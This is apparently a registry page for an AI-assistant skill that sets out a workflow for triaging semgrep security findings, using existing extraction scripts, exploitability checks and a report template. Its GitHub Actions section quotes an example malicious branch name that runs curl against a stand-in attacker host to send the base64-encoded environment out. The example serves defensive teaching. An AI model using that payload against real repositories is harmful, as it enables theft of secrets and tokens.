review-semgrep
Review and triage semgrep security scan results to identify true positive vulnerabilities. Use when analyzing semgrep output, triaging security findings, reviewing static analysis results, or when the user has semgrep-results directories to review. Performs deep code analysis to distinguish real vulnerabilities from false positives with high confidence.
Install
git clone https://github.com/majiayu000/claude-skill-registry /tmp/claude-skill-registry && cp -r /tmp/claude-skill-registry/skills/development/review-semgrep ~/.claude/skills/claude-skill-registry/
Tip: Run this command in your terminal to install the skill.
name: review-semgrep
description: Review and triage semgrep security scan results to identify true positive vulnerabilities. Use when analyzing semgrep output, triaging security findings, reviewing static analysis results, or when the user has semgrep-results directories to review. Performs deep code analysis to distinguish real vulnerabilities from false positives with high confidence.
Review Semgrep Security Findings
Expert security analysis workflow for triaging semgrep scan results and identifying true positive vulnerabilities.
Project Structure
All paths are relative to the project root (working directory):
threat_hunting/ # Project root (working directory)
├── <org-name>/ # Cloned repositories (e.g., jitsi/, tronprotocol/)
│ └── <repo-name>/ # Individual repository source code
├── findings/<org-name>/ # All scan results for an organization
│ ├── semgrep-results/ # Semgrep JSON output files
│ │ └── <repo-name>.json
│ ├── trufflehog-results/
│ ├── artifact-results/
│ ├── kics-results/
│ └── reports/ # Final consolidated reports
└── scripts/ # ALL extraction and scanning scripts
Repository source code location: <org-name>/<repo-name>/ (e.g., jitsi/jicofo/src/main/java/...)
Scan results location: findings/<org-name>/semgrep-results/<repo-name>.json
CRITICAL: Do NOT Write Custom Scripts
All extraction scripts already exist in ./scripts/. Never write custom jq, Python, or shell scripts to parse findings. The existing scripts handle:
- Complex JSON/NDJSON parsing
- Large file handling
- Edge cases and error handling
- Consistent output formatting
Available extraction scripts:
- ./scripts/extract-semgrep-findings.sh - Parse semgrep results
- ./scripts/extract-trufflehog-findings.sh - Parse trufflehog results
- ./scripts/extract-artifact-findings.sh - Parse artifact results
- ./scripts/extract-kics-findings.sh - Parse KICS results
If you need functionality not provided by existing scripts, ask the user to update the scripts rather than writing one-off solutions.
CRITICAL: Always Use the Extraction Script First
MANDATORY: Before doing ANY manual analysis, you MUST run the extraction script to get a summary of findings:
./scripts/extract-semgrep-findings.sh <org-name>
This script:
- Parses all JSON result files efficiently
- Extracts only the findings (not metadata bloat)
- Formats output in a readable, actionable format
- Shows severity, rule ID, file location, and description
DO NOT attempt to read JSON files directly or use Grep to parse them. The extraction script handles the complex JSON structure and large file sizes automatically.
Quick Reference
# Extract from findings/ directory (per-repo files)
./scripts/extract-semgrep-findings.sh <org-name> # All repos, summary
./scripts/extract-semgrep-findings.sh <org-name> summary <repo> # Specific repo
./scripts/extract-semgrep-findings.sh <org-name> count # Counts only
# Extract from catalog scans (merged gzipped files)
./scripts/extract-semgrep-findings.sh <org-name> --catalog # Latest scan
./scripts/extract-semgrep-findings.sh <org-name> --scan 2025-12-24 # Specific scan
# Scan repositories (if not already done)
./scripts/scan-semgrep.sh <org-name>
Data Sources:
- findings/<org>/semgrep-results/*.json - Per-repo results (uncompressed)
- catalog/tracked/<org>/scans/<timestamp>/semgrep.json.gz - Merged scan (gzipped)
Workflow
Step 1: Run the Extraction Script and Verify Counts
ALWAYS START HERE - Run the extraction script with count format first:
# Step 1a: Get counts to verify total findings
./scripts/extract-semgrep-findings.sh <org-name> count
# Step 1b: Then get the full summary
./scripts/extract-semgrep-findings.sh <org-name>
CRITICAL COUNT VERIFICATION: The summary output shows "Total: N findings" at the bottom. This MUST match the sum of all counts from step 1a. If they don't match, the extraction may be truncating results - investigate before proceeding.
Review the script output to understand:
- Total number of findings across all repos
- Which repos have the most findings
- Types of issues detected (by rule ID)
- Severity distribution (ERROR vs WARNING)
Note: Findings are sorted by severity (ERROR first, then WARNING). All ERROR findings appear at the top of the output for immediate attention.
Step 2: Triage Findings
For each finding, quickly assess whether it warrants deep analysis:
Likely FALSE POSITIVE - Skip these:
- Test files (*_test.go, *.spec.ts, __tests__/)
- Example/demo code (examples/, demo/, sample)
- Vendor/third-party code (vendor/, node_modules/)
- Documentation files showing code samples
- Intentional patterns with explanatory comments
Likely TRUE POSITIVE - Analyze these:
- Production code paths
- Code handling user input
- Authentication/authorization logic
- Cryptographic operations
- Database queries
- File system operations
Prioritize by severity:
- ERROR findings in production code
- WARNING findings in security-sensitive areas
- Everything else
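The path-based part of this triage can be captured in a few lines. The following is a minimal Python sketch of the skip heuristics above, not one of the existing ./scripts/ helpers; the directory and filename markers are the examples listed in this step and may need tuning per repository.
# Hypothetical illustration of the path-based triage heuristics - not part of ./scripts/
LIKELY_FALSE_POSITIVE_MARKERS = (
    "_test.go", ".spec.ts", "__tests__/",   # test files
    "examples/", "demo/", "sample",         # example/demo code
    "vendor/", "node_modules/",             # vendor/third-party code
)

def needs_deep_analysis(path: str) -> bool:
    # Skip findings whose path matches a likely-false-positive marker;
    # everything else proceeds to Step 3.
    return not any(marker in path.lower() for marker in LIKELY_FALSE_POSITIVE_MARKERS)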
Step 3: Deep Analysis
For each finding that passed triage, verify exploitability:
Read the Source Code
- Read the file at the reported location
- Examine 50+ lines of surrounding context
- Check for mitigating controls nearby
Verify Exploitability (CRITICAL)
Semgrep flags patterns, not proven vulnerabilities. Check:
Input Analysis:
- Is the input user-controlled or hardcoded?
- Constrained inputs (enums, dropdowns) → NOT exploitable
- Freeform inputs (text fields, URLs) → Potentially exploitable
Character Restrictions:
- Can dangerous characters reach the sink?
- GitHub usernames: [a-z0-9-] only → Cannot inject shell metacharacters
- UUIDs: [a-f0-9-] only → Cannot inject code
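To see why an allowlisted charset rules out injection, consider this minimal Python check (a hypothetical validator mirroring the [a-z0-9-] username charset above): any shell metacharacter causes the match to fail, so such values can never carry $( ), ;, | or & to a sink.
import re

# Hypothetical allowlist check mirroring the [a-z0-9-] charset above.
def is_allowlisted_username(value: str) -> bool:
    return re.fullmatch(r"[a-z0-9-]+", value) is not None

assert is_allowlisted_username("octocat-42")
assert not is_allowlisted_username("x$(curl attacker.example)")  # metacharacters rejected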
Sanitization:
- Is input validated before the dangerous function?
- Does the framework auto-escape (parameterized queries, template escaping)?
Access Control:
- Who can trigger this code path?
- Admin-only → Lower risk than public endpoints
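As a minimal illustration of the input-analysis and sanitization checks, assume a Python service using the standard sqlite3 module (hypothetical code, not from the scanned repositories): the first function lets user input reach the SQL sink unsanitized and would be a true positive, while the second uses a parameterized query and is not exploitable.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")

def find_user_vulnerable(name: str):
    # User-controlled value concatenated into SQL - dangerous sink reachable.
    return conn.execute(f"SELECT * FROM users WHERE name = '{name}'").fetchall()

def find_user_safe(name: str):
    # Parameterized query - the driver handles escaping, not exploitable.
    return conn.execute("SELECT * FROM users WHERE name = ?", (name,)).fetchall()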
Exploitability Verdict
For each finding, determine:
EXPLOITABLE - User input reaches dangerous sink without sanitization
NOT EXPLOITABLE - Input constrained, sanitized, or not user-controlled
NEEDS INVESTIGATION - Unclear data flow, requires more context
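To keep verdicts and reasoning consistent across many findings, a lightweight record such as the hypothetical sketch below can help; this is optional bookkeeping for the reviewer, not one of the project's scripts.
from dataclasses import dataclass
from enum import Enum

class Verdict(Enum):
    EXPLOITABLE = "EXPLOITABLE"
    NOT_EXPLOITABLE = "NOT EXPLOITABLE"
    NEEDS_INVESTIGATION = "NEEDS INVESTIGATION"

@dataclass
class TriagedFinding:
    check_id: str
    location: str      # e.g. path/to/file.py:123
    verdict: Verdict
    confidence: int    # percent; only report findings at 90 or above
    reasoning: str     # the data-flow argument behind the verdict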
Step 4: Report Findings
Only report findings with 90%+ confidence they are true positives.
For each confirmed finding:
## [Severity] Rule Name
**Repository**: repo-name
**File:Line**: path/to/file.py:123
**Confidence**: 95%
**Summary**: One-line description of the vulnerability
**Analysis**: Why this is a true positive - explain the vulnerable data flow
**Exploitability**: EXPLOITABLE
**Attack Path**: Concrete steps an attacker would take
**Evidence**:
[relevant code snippet]
**Remediation**: Specific fix recommendation
Final Summary:
- Total findings reviewed
- True positives identified (with count by severity)
- Most critical issues requiring immediate attention
- Patterns observed across repositories
Output Formats
Extraction script formats:
- summary (default) - Readable finding details
- count - Counts per repository
- full - Raw JSON for detailed analysis
Reference
JSON Structure (For Understanding Output)
Each finding in the extraction script output contains:
- check_id: Semgrep rule that triggered
- path: File path where finding was detected
- start.line / end.line: Line numbers
- extra.message: Vulnerability description
- extra.severity: ERROR, WARNING, INFO
- extra.metadata: CWE, OWASP references, confidence
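For orientation only, a single finding in the underlying JSON roughly has this shape; the field names are the ones listed above, while the values here are invented for illustration and real semgrep output contains additional fields:
finding = {
    "check_id": "python.lang.security.audit.dangerous-subprocess-use",  # illustrative rule ID
    "path": "src/app/tasks.py",
    "start": {"line": 42},
    "end": {"line": 44},
    "extra": {
        "message": "subprocess call with shell=True and user input ...",
        "severity": "ERROR",
        "metadata": {"cwe": ["CWE-78"], "owasp": ["A03:2021"], "confidence": "HIGH"},
    },
}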
Note: Do NOT manually parse JSON files - always use the extraction script.
Language-Specific Knowledge
When reviewing code in these languages, consult the detailed guides:
- PHP: See php-vulnerabilities.md for parser differentials (parse_url bypass), type juggling, strcmp bypass, and deserialization
- Python: See python-vulnerabilities.md for path traversal (os.path.join/pathlib bypass), pickle/ML deserialization RCE, YAML deserialization, class pollution (prototype pollution equivalent), dynamic import LFI (importlib.import_module()), SSTI, eval/exec injection, command injection, SSRF, and SQL injection (a short path-traversal sketch follows this list)
- NoSQL/MongoDB: See nosql-injection.md for operator injection ($ne, $gt, $regex), $where JavaScript injection, and auth bypass patterns across Python, Node.js, Java, Go, and Ruby
- XPath Injection: See xpath-injection.md for XPath injection patterns in Python (lxml), Java (javax.xml.xpath), PHP (SimpleXML/DOMXPath), C# (System.Xml.XPath), and Ruby (Nokogiri/REXML) - authentication bypass, data extraction, parameterized query remediation
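As one concrete illustration of the Python path-traversal point above, assuming a hypothetical upload handler: os.path.join discards every earlier component when a later component is absolute, so joining user input onto a base directory does not by itself confine the result.
import os

BASE_DIR = "/srv/app/uploads"  # hypothetical base directory

# os.path.join drops BASE_DIR entirely when the user-supplied value is absolute:
print(os.path.join(BASE_DIR, "report.txt"))   # /srv/app/uploads/report.txt
print(os.path.join(BASE_DIR, "/etc/passwd"))  # /etc/passwd  <- escapes the base

def resolve_upload(user_path: str) -> str:
    # One common mitigation sketch: resolve, then verify containment.
    resolved = os.path.realpath(os.path.join(BASE_DIR, user_path))
    if not resolved.startswith(BASE_DIR + os.sep):
        raise ValueError("path escapes the upload directory")
    return resolved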
GitHub Actions Security (CRITICAL)
GitHub Actions findings require special attention. Rule yaml.github-actions.security.run-shell-injection is HIGH SEVERITY:
Expression Injection Pattern
Vulnerable code in action.yml or workflow:
run: |
BRANCH=${{ github.head_ref }} # DANGEROUS - attacker controls branch name
Why it's critical:
- ${{ }} expressions are substituted BEFORE bash execution
- github.head_ref (PR branch name) is fully controlled by the PR author
- Shell metacharacters in branch names are passed directly to bash
- Any fork can create a malicious PR
Branch name restrictions allow:
- $() - command substitution
- ${} - variable expansion
- ; | & - command chaining
Exploitation:
# Attacker creates branch:
git checkout -b 'x$(curl attacker.com/?s=$(env|base64))y'
# Opens PR → GitHub Actions executes the command substitution
Impact:
- Full environment variable exfiltration
- Secret theft (if secrets in env at injection time)
- Repository write access via GITHUB_TOKEN
- Supply chain attacks
NOT a false positive if:
- The action/workflow is used by ANY other repository
- The workflow triggers on pull_request (exploitable via fork)
- Even if it is an "internal tool" - other repos using the action are vulnerable
Remediation:
env:
HEAD_REF: ${{ github.head_ref }}
run: |
BRANCH="$HEAD_REF" # Safe - variable not substituted by GitHub
Guidelines
- Be skeptical - false positives waste developer time
- Consider full context, not just the flagged line
- Pattern match ≠ vulnerability; verify exploitability
- Prioritize by real-world risk, not just severity labels
- Document your reasoning for each verdict